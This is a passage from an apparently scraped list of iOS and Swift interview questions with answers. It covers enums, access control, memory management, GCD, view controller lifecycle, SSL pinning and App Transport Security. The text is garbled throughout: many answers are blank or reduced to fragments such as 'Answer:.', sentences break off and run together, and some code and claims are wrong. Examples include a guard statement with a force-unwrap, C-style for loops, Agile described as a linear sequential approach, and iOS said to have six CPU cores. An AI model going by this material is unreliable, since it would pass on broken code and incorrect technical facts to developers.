UIWindow object? Answer: The presentation of one or more view on screen is coordinated by UIWindow object. 19. What is App bundle? Answer: An iOS app bundle contains the app executable file and supporting resources files such as app icons, image files and localised content. 20. How should one handle errors in Swift? Answer: In Swift, it’s possible to declare that a function throws an error. It is, therefore, the caller’s responsibility to handle the error or propagate it.() 21. What is a guard statement in Swift? Answer: It basically evaluates a boolean condition and proceeds with program execution if the evaluation is true. A guard statement always has an else clause, and it must exit the code block if it reaches there. guard let courses = student.courses! else {return} 22. What is Enum ? Answer: Enum is user defined data type. An enumeration is defined using the enum keyword and they define a common type for a group of related values. For example, given that there are seven colors in the rainbow you could create an enumeration named ColorsOfRainbow and add the seven colors as possible values. Enumerations are useful whenever you find yourself with an if-else ladder. Enumeration names are written with UpperCamelCase. The enumeration cases are written with smallCamelCase. This is the best practice. Enumerations can come with prepopulated values. These are known as raw values and these should all be of the same type. When you define an enumeration to have an integer or string values you do not need to explicitly assign a raw value for each case because Swift will do this automatically for you. Sometimes) Associated value:") LEARN S Enumerations are usually used with the switch statement. This allows us to match individual enumeration cases. A switch statement must be exhaustive meaning it should cover every possible case in an enumeration. However, you only need to cover a few enumeration cases if you create a default case in your switch statement. The keywords break and fallthrough are control flow statements used with enumerations. break causes a switch statement to end its execution immediately and to transfer control to the code after a switch’s closing brace (}). fallthrough will make a switch statement to fall into the next case. Continue: A continue statement ends program execution of the current iteration of a loop statement but does not stop execution of the loop statement. var sum = 0; for var i = 0 ; i < 5 ; i++ { if i == 4 { continue //this ends this iteration of the loop } sum += i //thus, 0, 1, 2, and 3 will be added to this, but not 4 } Break: A break statement ends program execution of a loop, an if statement, or a switch statement. var sum = 0; for var i = 0 ; i < 5 ; i++ { if i == 2 { break //this ends the entire loop } sum += i //thus only 0 and 1 will be added } Fallthrough: A fallthrough statement causes program execution to continue from one case in a switch statement to the next case. var sum = 0 var i = 3 switch i { case 1: sum += i case 2: sum += i case 3: sum += i fallthrough //allows for the next case to be evaluated case i % 3: sum += i } Sometimes it is useful to have a value stored with an enumeration case. This is called an associated value and this can be any type that you define. 23. What is static variable? Answer: Static variables are those variables whose values are shared among all the instance or object of a class. When we define any variable as static, it gets attached to a class rather than an object. The memory for the static variable will be allocation during the class loading time. static variable can’t be override we can directly call variable using class name (Animal.nums) (also called instance property) instead of using object name (dog.nums) Sharing information class Animal { static var nums = 0 init() { Animal.nums += 1 } } let dog = Animal() Animal.nums // 1 let cat = Animal() Animal.nums // 2 As you can see here, I created 2 separate instances of Animal but both do share the same static variable nums. Singleton Often a static constant is used to adopt the Singleton pattern. In this case we want no more than 1 instance of a class to be allocated. To do that we save the reference to the shared instance inside a constant and we do hide the initializer. class Singleton { static let sharedInstance = Singleton() private init() { } func doSomething() { } } 24. Enumerate items in an array Answer: There several ways to loop through an array in Swift, but using the enumerated() method is one of my favorite because it iterates over each of the items while also telling you the items’s position in the array. Here’s an example: let array = ["Apples", "Peaches", "Plums"] for (index, item) in array.enumerated() { print("Found \(item) at position \(index)") } That will print “Found Apples at position 0”, “Found Peaches at position 1”, and “Found Plums at position 2”. 25. Didset/willset Answer: property observers, which let you execute code whenever a property has changed. To make them work, we use either didSet to execute code when a property has just been set, or willSet to execute code before a property has been set var score = 0 { didSet { scoreLabel.text = "Score: \(score)" } } Using this method, any time score is changed by anyone, our score label will be updated 26. Mutating Functions Answer: In swift, classes are reference type whereas structures and enumerations are value types. The properties of value types cannot be modified within its instance methods by default.. Below is a simple implementation of Stack in Swift that illustrates the use of mutating functions. struct Stack { public private(set) var items = [Int]() // Empty items array mutating func push(_ item: Int) { items.append(item) } // if we dont write mutating it will give compile time error mutating func pop() -> Int? { if !items.isEmpty { return items.removeLast() } return nil } } var stack = Stack() stack.push(4) stack.push(78) stack.items // [4, 78] stack.pop() stack.items // [4] 27. Diff. in Points and Pixels – The Reason We Need @2x and @3x Icons Answer: The Problem of Higher Pixel Density Why do we have to create @2x and @3x icons? Well, not too long ago, all iPhones had a standard resolution. However, all this changed when the iPhone 4 was released. The iPhone 4 came with retina display with twice as many pixels as before. More pixels meant that graphics appeared clearer to users but what this also meant was that graphics on a non-retina device will smaller on a retina display. For example, a 100px by 100px image on a non-retina device would look like a 50px by 50px image even though its actual size is still 100px by 100px. Things only got worse with the introduction of the iPhone 6 Plus which had three times as many pixels as the older devices. How Points Solved Differing Pixel Densities To ensure that graphics displayed at the correct size regardless of device, Apple came up with the system of points. A point is a device independent measurement. On non-retina devices 1 point is equal to 1 pixel. On retina devices like iPhone 4, 5 and 6 – 1 point is equal to 2 pixels. And on much larger devices like iPhone 6 Plus with higher pixel density 1 point is equal to 3 pixels. 28. Why don’t we use strong for enum property in Objective-C ? Answer: Because enums aren’t objects, so we don’t specify strong or weak here 29. What is super keyword Answer: ‘super’ keyword is used as a prefix to access the methods, properties and subscripts declared in the super class class Circle { var radius = 12.5 var area: String { return "of rectangle for \(radius) " } } class Rectangle: Circle { var print = 7 override var area: String { return super.area + " is now overridden as \(print)" } } 30.. NSObject is called universal base class for all cocoa touch classes 31. What is reuseIdentifier? Answer: The reuseIdentifier is used to indicate that a cell can be re-used in a UITableView. For ex.. 32. What’s Completion Handler ? Answer:. 33. Explain the difference between atomic and nonatomic synthesized properties? Answer:stuff.”. 34. Which API would you use to write test scripts to exercise the application’s UI elements? Answer: UI Automation API is used to automate test procedures. JavaScript test scripts that are written to the UI Automation API simulate user interaction with the application and return log information to the host computer. 35. Which is the framework that is used to construct application’s user interface for iOS? 36. Which is the application thread from where UIKit classes should be used? Answer: UIKit classes should be used only from an application’s main thread. 37. What is Responder Chain ? Answer: A ResponderChain is a hierarchy of objects that have the opportunity to respond to events received. When an event happens in a view, for example a touch event, the view will fire the event to a chain of UIResponder objects associated with the UIView. The first UIResponder is the UIViewitself, if it does not handle the event then it continues up the chain to until UIResponder handles the event. The chain will include UIViewControllers, parent UIViews and their associated UIViewControllers, if none of those handle the event then the UIWindow is asked if it can handle it and finally if that doesn’t handle the event then the UIApplicationDelegate is asked. 38- What is Regular expressions ? Answer: Regular expressions are special string patterns that describe how to search through a string. ex. regular expression for strong password, RE for correct mobile number. 39. What is Functions ? Answer:.` 40. What is the difference between viewDidLoad and viewDidAppear? Which should you use to load data from a remote server to display in the view? Answer: viewDidLoad is called when the view is loaded, whether from a Xib file, storyboard or programmatically created in loadView. viewDidAppear is called every time the view is presented on the device. Which to use depends on the use case for your data. If the data is fairly static and not likely to change then it can be loaded in viewDidLoad and cached. However if the data changes regularly then using viewDidAppear to load it is better. In both situations, the data should be loaded asynchronously on a background thread to avoid blocking the UI. 41.What considerations do you need when writing a UITableViewController which shows images downloaded from a remote server? Answer: -. - Can cache downloaded images if its not available in cache. 42. What is a protocol, and how do you define your own and when is it used? Answer: A protocol is similar to an interface from Java. It defines a list of required and optional methods that a class must/can implement if it adopts the protocol. Any class can implement a protocol and other classes can then send messages to that class based on the protocol methods without it knowing the type of the class. 43. What is KVC and KVO? Give an example of using KVC to set a value. Answer: KVC. Let’s say there is a property name on a class: @property (nonatomic, copy) NSString *name; We can access it using KVC: NSString *n = [object valueForKey:@”name”] And we can modify it’s value by sending it the message: [object setValue:@”Mary” forKey:@”name”] 44. What’s your preference when writing UI’s? Xib files, Storyboards or programmatic UIView? Answer: There’s no right or wrong answer to this, but it’s great way of seeing if you understand the benefits and challenges with each approach. Here’s the common answers I hear: - Storyboard’s and Xib’s are great for quickly producing UI’s that match a design spec. They are also really easy for product managers to visually see how far along a screen is. - Storyboard’s are also great at representing a flow through an application and allowing a high-level visualizations of an entire application. - Storyboard’s drawbacks are that in a team environment they are difficult to work on collaboratively because they’re a single file and merge’s become difficult to manage. - Storyboards and Xib files can also suffer from duplication and become difficult to update. For example if all button’s need to look identical and suddenly need a color change, then it can be a long/difficult process to do this across storyboards and xibs. - Programmatically constructing UIView’s can be verbose and tedious, but it can allow for greater control and also easier separation and sharing of code. They can also be more easily unit tested. Most developers will propose a combination of all 3 where it makes sense to share code, then re-usable UIViews or Xib files. 45. How would you securely store private user data offline on a device? What other security best practices should be taken? Answer: - If the data is extremely sensitive then it should never be stored offline on the device because all devices are crackable. - The keychain is one option for storing data securely. However it’s encryption is based on the pin code of the device. User’s are not forced to set a pin, so in some situations the data may not even be encrypted. In addition the users pin code may be easily hacked. - A better solution is to use something like SQLCipher which is a fully encrypted SQLite database. The encryption key can be enforced by the application and separate from the user’s pin code. Other security best practices are: - Only communicate with remote servers over SSL/HTTPS. - If possible implement certificate pinning in the application to prevent man-in-the-middle attacks on public WiFi. - Clear sensitive data out of memory by overwriting it. - Ensure all validation of data being submitted is also run on the server side. With SSL pinning, we can refuse all connections except the ones with the designated server whose SSL certificate we’ve saved into our local bundle middle of the communication between the device U and router Rand it can eavesdrop or block it. IP forwarding is often used on the attacker’s device to keep the communication flowing seamlessly between the user’s device and router. Things are a bit more tricky when it comes toNSURLSession SSL pinning. There is no way to set an array of pinned certificates and cancel all responses that don’t match our local certificate automatically. We need to perform all checks manually to implement SSL pinning onNSURLSession. Alomfire there is one method ServerTrustPolicy.certificatesInBundle() method which returns all the certificates within the bundle. By default,AFNetworking will scan through your bundle and check for all “.cer” files, and add them to the manager.securityPolicy.pinnedCertificates array With the release of the iOS 9, the App Transport Security library was also introduced. By default, ATS denies all insecure connections which do not use at least the TLS 1.2 protocol. 46. What is Autorelease pool? Answer: The concept of an autorelease pool is simple, whenever an object instance is marked as autoreleased (for example NSString*str = [[[NSString alloc] initWithString:@”hello”] autorelease];), it will have a retain count of +1 at that moment in time, but at the end of the run loop, the pool is drained, and any object marked autorelease then has its retain count decremented. It’s a way of keeping an object around while you prepare whatever will retain it for itself. 47. What is ViewLifeCycle? Answer: loadView viewDidLoad viewWillAppear viewWillLayoutSubviews viewDidLayoutSubviews viewDidAppear 48. What is Design Pattern? Answer: viewController is tightly coupled because of viewLifecycle MVC, MVP(uikit independent mediator) , MVVM (mediator is VM and UIKITindependant) Viper – granularity in responsibilities is very good (view interactor presenter entity router) 49. A product manager in your company reports that the application is crashing. What do you do? Answer: You’re not given much information, but some interviews will slip you more details of the issue as you go along. Start simple: - get the exact steps to reproduce it. - find out the device, iOS version. - do they have the latest version? - get device logs if possible. Once you can reproduce it or have more information then start using tooling. Let’s say it crashes because of a memory leak, I’d expect to see someone suggest using Instruments leak tool. A really impressive candidate would start talking about writing a unit test that reproduces the issue and debugging through it. Other variations of this question include slow UI or the application freezing. Again the idea is to see how you problem solve, what tools do you know about that would help and do you know how to use them correctly. 50. What is AutoLayout? What does it mean when a constraint is “broken” by iOS? Answer: AutoLayout is way of laying out UIViews using a set of constraints that specify the location and size based relative to other views or based on explicit values. AutoLayout makes it easier to design screens that resize and layout out their components better based on the size and orientation of a screen. _Constraint_s include: - setting the horizontal/vertical distance between 2 views - setting the height/width to be a ratio relative to a different view - a width/height/spacing can be an explicit static value Sometimes constraints conflict with each other. For example imagine a UIView which has 2 height constraints: one says make the UIView 200px high, and the second says make the height twice the height of a button. If the iOS runtime can not satisfy both of these constraints then it has to pick only one. The other is then reported as being “broken” by iOS. 51. What is the difference between Synchronous & Asynchronous task ? Answer: Synchronous waits until the task has completed. Asynchronous: completes a task in background and can notify you when complete 52. Security updates in iOS 10 Answer: App Transport Security (ATS) was introduced in iOS 9 as a built in utility for protecting network communications, namely connections which use the NSURLSession and NSURLConnection APIs. Out of the box, ATS enforces a TLS configuration with the following criteria: - Apps must connect to servers using the TLS 1.2 protocol - server must use HTTPS protocol Important, by the end of 2016, Apple will enforce the use of ATS during App Store approval. It is therefore very important that engineering teams start to roadmap migration to securer HTTPS configurations as soon as possible. As a developer, you can still configure exceptions in the ATS configuration, but you will be required to provide a justification in the app store review as to why you require the exception. During the “What’s new in Security WWDC16 session”, Apple stated that one example use case for exceptions might be when you communicate with a 3rd party and don’t have control over their HTTPS configuration. Another example is when an Application communicates dynamically to various internet sites such as within a WebView. A 3rd example of an exception might be because the domain you want to communicate with does not offer Perfect Forward Secrecy. ATS required by 2017 App Transport Security was introduced last year and by default blocks “unprotected” connections initiated by Apps, ie. connections that do not use HTTPS with the strongest TLS version and cipher suites. Because switching servers to the strongest TLS configuration takes time, Apple also allowed App developers to selectively disable ATS requirements by adding exemptions in the App’s Info.plist. Purpose strings required When built for iOS 10, an App will crash if it tries to request access for a data class that does not have a purpose string defined. Purpose string keys where introduced in iOS 6; there is one key defined for each type of privacy-sensitive data (contacts, camera, photo library, etc.). App developers can add these keys to the App’s Info.plist to provide a sentence that explains why the App needs access to the data; the explanation then gets displayed in the user-facing permission prompt: Not providing a purpose string will now crash the App when the permission prompt was going to be displayed. Apple made this change for two reasons: - It forces App developers to inform the user about the reason why the App needs access to the data. - It prevents third-party SDKs within the App from requesting access to data the App developers never intended to access in the first place. Additionally, there are several new consent alerts in iOS 10, with a corresponding purpose string: - Media Library, for allowing access to Apple Music subscriber status and playlists. - Speech Recognition, for allowing audio files to be sent to Apple for speech transcription done on behalf of the App. - SiriKit, for allowing the App to receive Siri requests. - TV Provider information (tvOS only), for automatically logging the user into streaming Apps based on their cable subscription. - - 53. What is the difference between public and open? Why is it important to have both? Answer: in. 54. What is waterfall methodology and Agile methodology? What are the differences between them? Answer: Waterfall methodology is a sequential model for software development. It is separated into a sequence of pre-defined phases including feasibility, planning, design, build, test, production, and support. On the other hand, Agile development methodology is a linear sequential approach internal. 55. What is the difference between a class and an object? Answer: In the simplest sense, a class is a blueprint for an object. It describes the properties and behaviours common to any particular type of object. An object, on the other hand, is an instance of a class. 56. Is it faster to iterate through an NSArray or an NSSet? Answer:. 59. Generics Answer: ‘Generic’ features to write flexible and reusable functions and types. Generics are used to avoid duplication. for ex. if we want to swap two values (which can be int, string, double) so instead of wring diff functions for string, int, double we can create generic function func exchange<T>(a: inout T, b: inout T) { let temp = a a = b b = temp } var numb1 = 100 var numb2 = 200 print("Before Swapping Int values are: \(numb1) and \(numb2)") exchange(a: &numb1, b: &numb2) print("After Swapping Int values are: \(numb1) and \(numb2)") var str1 = "Generics" var str2 = "Functions" print("Before Swapping String values are: \(str1) and \(str2)") exchange(a: &str1, b: &str2) print("After Swapping String values are: \(str1) and \(str2)") Memory Management What is memory leak? A memory leak. 60. What is the difference between weak and strong, read only, copy, Retain, unowned ? Answer: Weak self and unowned self in Swift for many of us are hard to understand. Although Automatic Reference Counting (ARC) solved a lot for us already, we still need to manage references when we’re not working with value types. First, objects are strong by default. - Strong means that the reference count will be increased and the reference to it will be maintained throughout) Weak weak will nullify the pointer whenever the reference is deallocated but unowned won’t do that, so that may results in dangling pointer. Because weak references need to allow their value to be changed to nil at runtime, they are always declared as variables and optional if let and not optional use unowned weak var customer: Customer? Weak and unowned are used to solve leaked memory and retain cycles. Both do not increase the retain count. Common instances of weak references are delegate properties and subview/controls of a view controller’s main view since those views are already strongly held by the main view. Read only, we can set the property initially but then it can’t be changed. Copy, means that we’re copying the value of the object when it’s created. Also prevents its value from changing. Retain:. unowned You could use unowned when the other instance has same life time or longer lifetime. Take an example of Customer and CreditCard. Here, CreditCard cannot exist without a customer. A CreditCard instance never outlives the Customer that it refers to, And we only create a CreditCard instance by passing Customer instance in the initialiser. So we can absolutely guarantee that this CreditCard cannot exist without the Customer. 61. What is tuple in swift? Answer: Tuple is used to group multiple values in a single compound Value. The values in a tuple can be of any type, and do not need to be of same type. For example, (“Tutorials Point”, 123) Design Pattern 62. Why is design pattern very important ? Answer: Design patterns are reusable solutions to common problems in software design. They’re templates designed to help you write code that’s easy to understand and reuse. Most common Cocoa design patterns: - Creational: Singleton. - Structural: Decorator, Adapter, Facade. - Behavioral: Observer, and, Memento 63. What is extension and why to use? Answer: Swift Extension is a useful feature that helps in adding more functionality to an existing Class, Structure, Enumeration or a Protocol type. This includes adding functionalities for types where you don’t have the original source code too (extensions for Int, Bool etc.) for ex. extension for alertcontroller which has function which takes parameter for title and message so that we can use this in multiple places instead of writing whole alertcontroller code everywhere. extension Int { var square : Int{ return self*self } func cube()->Int{ return self*self*self } mutating func incrementBy5() { self = self + 5 } } var x : Int = 5 print(x.square) //prints "25\n" print(x.cube()) //prints "125\n" x.incrementBy5() // 10 64. What is MVC? Answer: MVC stands for Model-View-Controller. It is a software architecture pattern for implementing user interfaces. MVC consists of three layers: the model, the view, and the controller. - The model layer is typically where the data resides (persistence, model objects, etc) - Database model layer takes data from database and process on it -. Real life example: Example of restaurant Inventory is a database where all groceries are stored. (ingredients for pizza) Kitchen is a model where groceries (data) is processed (to make pizza) taken from Inventory (database) as per required to present to a customer (view). (prepare pizza fro) Waiter is Controller who communicates with a customer(view) and chef (model) Customer or table is a view where processed food (data) is presented by a waiter (controller) here customer (view) don’t go directly in kitchen (model) 65. What is MVVM? Answer: MVVM stands for Model-View-ViewModel. It is a software architecture pattern for implementing user interfaces. MVVM is an augmented version of MVC where the presentation logic is moved out of the controller and putability of your code easier to follow along, the MVVM will be used. Design, View, Storyboard 66. What’s the difference between the frame and the bounds? Answer: The frame of a UIView is the region relative to the superview it is contained within while the bounds of a UIView is the region relative to its own coordinate system.. 67. Which are the ways of achieving concurrency in iOS? Answer: The three ways to achieve concurrency in iOS are: - Threads - Dispatch queues - Operation queues Thread management 68. What is threads? Answer: behind the scenes your app actually executes multiple sets of instructions at the same time, which allows it to take advantage of having multiple CPU cores (iOS has CPU 6 cores). Each CPU can be doing something independently of the others, which hugely boosts your performance. These code execution processes are called threads, Threads execute the code you give them, they don’t just randomly execute a few lines from viewDidLoad() each. This means by default your own code executes on only one CPU, because you haven’t created threads for other CPUs to work on. All user interface work must occur on the main thread, which is the initial thread your program is created on. You don’t get to control when threads execute, or in what order. You create them and give them to the system to run, and the system handles executing them as best it can. if all user interface code must run on the main thread, and we just blocked the main thread by using Data‘s contentsOfor service call, it causes the entire program to freeze – the user can touch the screen all they want, but nothing will happen.. 69. What is the difference between synchronous and asynchronous task? Answer: Synchronous tasks wait until the task has been completed while asynchronous tasks can run in the background and send a notification when the task is complete. 70. Explain the difference between Serial vs Concurrent Answer: Tasks executed serially are executed one at a time while tasks that are executed concurrently may be executed at the same time. 71. What is GCD and how is it used? – concept GCD stands for Grand Central Dispatch.. GCD creates for you a number of queues, and places tasks in those queues depending on how important you say they are. All are FIFO, meaning that each block of code will be taken off the queue in the order they were put in, but more than one code block can be executed at the same time so the finish order isn’t guaranteed. “How important” some code is depends on something called “quality of service”, or QoS, which decides what level of service this code should be given. Obviously at the top of this is the main queue, which runs on your main thread, and should be used to schedule any work that must update the user interface immediately even when that means blocking your program from doing anything else. But there are four background queues that you can use, each of which has their own QoS level set: - User Interactive: this is the highest priority background thread, and should be used when you want a background thread to do work that is important to keep your user interface working. This priority will ask the system to dedicate nearly all available CPU time to you to get the job done as quickly as possible. - User Initiated: this should be used to execute tasks requested by the user that they are now waiting for in order to continue using your app. It’s not as important as user interactive work – i.e., if the user taps on buttons to do other stuff, that should be executed first – but it is important because you’re keeping the user waiting. - The Utility queue: this should be used for long-running tasks that the user is aware of, but not necessarily desperate for now. If the user has requested something and can happily leave it running while they do something else with your app, you should use Utility. - The Background queue: this is for long-running tasks that the user isn’t actively aware of, or at least doesn’t care about its progress or when it completes. Those QoS queues affect the way the system prioritizes your work: User Interactive and User Initiated tasks will be executed as quickly as possible regardless of their effect on battery life, Utility tasks will be executed with a view to keeping power efficiency as high as possible without sacrificing too much performance, whereas Background tasks will be executed with power efficiency as its priority. 72. NSOperationQueue : Answer: NSOperationQueue is objective C wrapper over GCD . we can set priority to each queue. and can start stop and pause operation if one task is depends on another. It use for complex thing 73. What is dispatch queues? Answer: Dispatch queues are an easy way to perform tasks asynchronously and concurrently in your application Unit testing, UI testing 73. XCTest – XCTAssertEqual, XCTAssertNotNil, XCTAssertTrue 74. What’s Code Coverage ? Answer: Code coverage is a tool that helps us to measure the value of our unit tests. 75. What is setUp() and tearDown() in unit testing? Answer: - setUp() — This method is called before the invocation of each test method in the given class. - tearDown() — This method is called after the invocation of each test method in given class. Objective c – 76. Explain what is @synthesize in Objective-C? Answer: Once you have declared the property in objective-C, you have to tell the compiler instantly by using synthesize directive. synthesize generates getter and setter methods for your property. 77. What is @dynamic in Objective-C ? Answer: Dynamic for properties means that it setters and getters will be created manually and/or at runtime. We can use dynamic not only for NSManagedObject. 78. Why do we use synchronized? Answer: synchronized guarantees that only one thread can be executing that code in the block at any given time. 79. What is the difference between category and extension in Objective-C? Answer: fm.smartcloud.io/ios-interview-questions-for-senior-developers-in-2017-a94cc81c8205 80. Access controls in Swift Answer: Access controls keyword enables you to hide the implementation details of your code, and to specify a preferred interface through which that code can be accessed and used. There are 5 access controls: 1. open (most accessible, least restrictive) 2. public 3. internal (default) 4. fileprivate 5. private (least accessible, more restrictive) 1. open : It enable entity to be used in and outside of defining module and also other module. UIButton, UITableView is in UIKit. We import UIKit and make subclass of UITableView and use in our module in which we have imported UIKit. So tableview subclass of UITableView defined in UIKit is used in our module. Sot it is accessible in our module. open class UITableView : UIScrollView, NSCoding { } 2. public : open allows us to subclass from another module. public allows us to subclass or override from within module in which it defined. public func A(){} //module X open func B(){}//module Y override func A(){} // error override func B(){} // success So open class and class members can be accessible and overridden in which it is defined and also in which module it is imported. public class and class members can be accessible and overridden only in which it is defined. 3. internal : Internal classes and members can be accessed anywhere within the same module(target) they are defined. You typically use internal-access when defining an app’s or a framework’s internal structure. 4. fileprivate : Restricts the use of an entity to its defining file. It is used to hide implementation details when details are used in entire file. fileprivate method is only accessible from that swift file in which it is defined. 5. private : Restricts the use of an entity to the enclosing declaration and to extension of that swift file or class. It is used to hide single block implementation. Design pattern 81. What do you know about singletons? Where would you use one and where would you not? Answer: Singleton is a class that returns only one and the same instance no matter how many times you request it. Singletons are sometimes considered to be an anti-pattern. There are multiple disadvantages to using singletons. The two main ones are global state/statefulness and object life cycle and dependency injection. When you have only one instance of something, it is very tempting to reference and use it everywhere directly instead of injecting it into your objects. That leads to unnecessary coupling of concrete implementation in your code instead of interface abstraction. Another malicious side effect of “convenient” singletons is global state. Quite often singletons enable global state sharing and play the role of a “public bag” that every object uses to store some state. That leads to unpredictable results and bugs and crashes when this uncontrolled state gets overridden or removed by someone. Ex. We can use singleton in game where we want to store score. 82. Could you explain what the difference is between Delegate and KVO? Answer:. Most people use this for receiving system messages, for example to be notified when they keyboard appears or disappears, but you can also use it to send your own messages inside your app. App Lifecycle 83. What’s the difference between not-running, inactive, active, background and suspended execution states? Answer: - Not running: The app has not been launched or was running but was terminated by the system. - Inactive: The app is running in the foreground, but not receiving events (It may be executing other code though.) . An iOS app can be placed into an inactive state, for example, when a call or SMS message is received or user locks the screen. - Active: The app is running in the foreground and is receiving events. -. 84. Which are the app’s state transitions when it is launched? 86. View Lifecycle Answer: A View Controller manages a set of views and helps in making the application’s user interface. It coordinates with model objects and other controller objects. It is known for playing the role for both view objects and controller objects. Each view controller displays its own views for the app content. The views are loaded automatically when the user accesses the view property of view controller in the app. Let’s focus on the events required to load a view. > Lifecycle events order init(coder:) (void)loadView (void)viewDidLoad (void)viewWillAppear (void)viewDidAppear (void)didReceiveMemoryWarning (void)viewWillDisappear (void)viewDidDisappear How can we use them? – init init(coder:) While creating the views of your app in a Storyboard, init(coder:) is the method that gets called to instantiate your view controller and bring it to life. During the initial phase of a view controller, you usually allocate the resources that the view controller will need during its lifetime. In this method, you might instantiate dependencies, including subviews that you’ll add to your view programmatically. And note that init(coder:) is called only once during the life of the object, as all init methods are. – LoadView (void)loadView It is only called when the view controller is created and only when done programatically. You can override this method in order to create your views manually. This is the method that creates the view for the view controller. If you are working with storyboards or nib files, then you do not have to anything with this method and you can ignore it. Its implementation in UIViewController loads the interface from the interface file and connects all the outlets and actions for you. – viewDidLoad -(void)viewDidLoad { [super viewDidLoad]; } It’s only called when the view is created. Keep in mind that in this lifecycle step the view bounds are not final. Good place to init and setup objects used in the viewController. When this method gets called, the view of the view controller has been created and you are sure that all the outlets are in place. It is also a good place where to start some background activity where you need to have the user interface in place at the end. A common case are network calls that you need to do only once when the screen is loaded. This method is called only once in the lifetime of a view controller, so you use it for things that need to happen only once. – viewWillAppear (void)viewWillAppear:(BOOL)animated You override this method for tasks that require you to repeat every time a view controller comes on screen. Keep in mind that this method can be called several times for the same instance of a view controller. This event is called every time the view appears and so, there is no need to add code here, which should be executed just one time. Usually you use this method to update the user interface with data that might have changed while the view controller was not on the screen. You can also prepare the interface for animations you want to trigger when the view controller appears. – viewDidAppear (void)viewDidAppear:(BOOL)animated This method gets called after the view controller appears on screen. You can use it to start animations in the user interface, to start playing a video or a sound, or to start collecting data from the network. In some cases can be a good place to load data from core data and present it in the view or to start requesting data from a server. – didReceiveMemoryWarning (void)didReceiveMemoryWarning iOS devices have a limited amount of memory and power. When the memory starts to fill up, iOS does not use its limited hard disk space to move data out of the memory like a computer does. If your app starts using too much memory, iOS will notify it. Since view controllers perform resource management, these notifications are delivered to them through this method. In this way you can take actions to free some memory. Keep in mind that if you ignore memory warnings and the memory used by your app goes over a certain threshold, iOS will end your app means this will look like a crash to the user and should be avoided. – viewWillDisappear (void)viewWillDisappear Before the transition to the next view controller happens and the origin view controller gets removed from screen, this method gets called. You rarely need to override this method since there are few common tasks that need to be performed at this point, but you might need it. – viewDidDisappear (void)viewDidDisappear After a view controller gets removed from the screen, this method gets called. You usually override this method to stop tasks that are should not run while a view controller is not on screen. For example, you can stop listening to notifications, observing other objects properties, monitoring the device sensors or a network call that is not needed anymore. Memory management 87. How is memory management handled in iOS? Answer: Swift uses Automatic Reference Counting (ARC). This is conceptually the same thing in Swift as it is in Objective-C. ARC keeps track of strong references to instances of classes and increases or decreases their reference count accordingly when you assign or unassign instances of classes (reference types) to constants, properties, and variables. It deallocates memory used by objects whose reference count dropped to zero. ARC does not increase or decrease the reference count of value types because, when assigned, these are copied. By default, if you don’t specify otherwise, all the references will be strong references. App deployment 88. Diff. between Bundle ID and App ID Answer: - A Bundle ID precisely identifies a single app. A bundle ID or bundle identifier uniquely identifies an application in Apple’s ecosystem. This means that no two applications can have the same bundle identifier. To avoid conflicts, Apple encourages developers to use reverse domain name notation for choosing an application’s bundle identifier. For example, if your organization’s domain is abc.com and you create an app named Hello, you could assign the string com.abc.Hello as your app’s bundle ID. 2.. App id is a combination of two strings, are separated by a period (.). String1 is a team id, Which is assigned to the development team.(provided by apple) String2 is a bundle id, is selected by you. App id is having two types. - Explicit App ID: Here team id is used to match only one app with a specific bundle id. This app id is used to match one app only. example: TEAM_ID.BUNDLE_ID - Wildcard App IDs: Here team id is used to match multiple apps with multiple bundle ids. This app id is used to match multiple apps. examples: TEAM_ID.BUNDLE_ID1, TEAM_ID.BUNDLE_ID2 … 89. Differences between internal testers and external testers in test-flight? - Must be added manually via iTC - 25 Max allowed - Once your app is uploaded it’s available immediately for internal testers (before it has been reviewed) - All internal testers must be added as a user in your iTC “Users and Roles” settings, which gives them certain permissions (review other answers and the docs for this). You wouldn’t want to give just anyone permissions here. - Do not have a 60-day time limiti - Will only be able to use your uploaded build for up to 60 days. If you add additional builds, they can update, and the 60 days starts over again. - Will be able to test your app after - You have submitted it for review - It gets approved in TestFlight review and - You set it to be available for testing. The review process is usually instant for new builds with the same version number. If you add a new version number, the review process can take up to 48hrs as of 10/2016. - Up to 2000 email addresses can be added. Each email address will allow a user to install the app on multiple devices. The email addresses do not need to match their Apple IDs. - They receive an invite to install your app once your first build is available for testing. If you add a new user after making a build available for testing, they’ll immediately receive an invite. All users will receive notifications to install newer versions of the app if you upload additional builds. - Will be disallowed from using your app after you have pushed it to the official app store (which promptly ends the beta) or 60 days have passed since you started the beta, whichever comes first. If you end the beta without launching in the app store, and they try to open it, it will crash. Yay, Apple UX! If you do push a version to the app store with the same bundleName, version, and bundleID (build number doesn’t matter), then your beta testers will automatically receive the app-store version of the app when it goes live. 90. What is app thining? There are three aspects of app thining. 1. App Slicing : Slicing is the process of creating and delivering variants of the app bundle for different target devices.. 2. On Demand Resources :). 3. Bitcode : Bitcode makes apps as fast and efficient as possible on whatever device they’re running. Bitcode automatically compiles the app for the most recent compiler and optimizes it for specific architectures. Can be turned on by the project settings under Build Settings and selecting bitcode to YES. App thining process can be test by TestFlight software and install in various device. Size may be vary. XCode 91. How to call segue programmatic? For segue first, We have to set identifier in Class Inspector right side in XCode. Through that identifier, we can call like performSegue(withIdentifier: “identifier”, sender: nil) 92. Diff between get and post? 93. Diff and use of nsurlconnection and nsurlsession? An NSURLConnection object handles a single request and any follow-on requests. An NSURLSession object manages multiple tasks, each of which represents a single URL request and any follow-on requests. An NSURLConnection object lets you load the contents of a URL by providing a URL request object. The interface for NSURLConnection is sparse, providing only the controls to start and cancel asynchronous loads of a URL request 94. Understanding Session Task Types Answer: There are three types of concrete session tasks: - URLSessionDataTask: Use this task for GET requests to retrieve data from servers to memory. - URLSessionUploadTask: Use this task to upload a file from disk to a web service via a POST or PUT method. - URLSessionDownloadTask: Use this task to download a file from a remote service to a temporary file location. 95. Background fetch Answer: to perform task when app is in background state. first enable background fetch in capabilities. tell iOS how often you want background fetch to happen. This is usually done inside the didFinishLaunchingWithOptions method in AppDelegate.swift, like this: application.setMinimumBackgroundFetchInterval(1800)//or UIApplication.shared.setMinimumBackgroundFetchInterval(UIApplication.backgroundFetchIntervalMinimum) performFetchWithCompletionHandler- use this method in appdelegate to perform required task 96. OOps concepts with real life and iOS examples // all concepts in detail 96. Type Of notification in iOS? Answer: - Push / Remote notification - Local notification - Badge notification ( notification on Bell icon ) 97. How Pushnotification works and what is limit for pushnotification? Answer: Pushnotification link 98. Diff between i++ and ++i Answer: i++ will increment the value of i, but return the original value of that i held before incremented i = 1, j = i++. (result i = 2, j = 1) first assign then increment ++i will increment the value of i, and then return the incremented value i = 1, j = ++i. (result i = 2, j = 2) first increment then assign 99. What is init? Different type of initialiser Answer: Designated initializer A designated 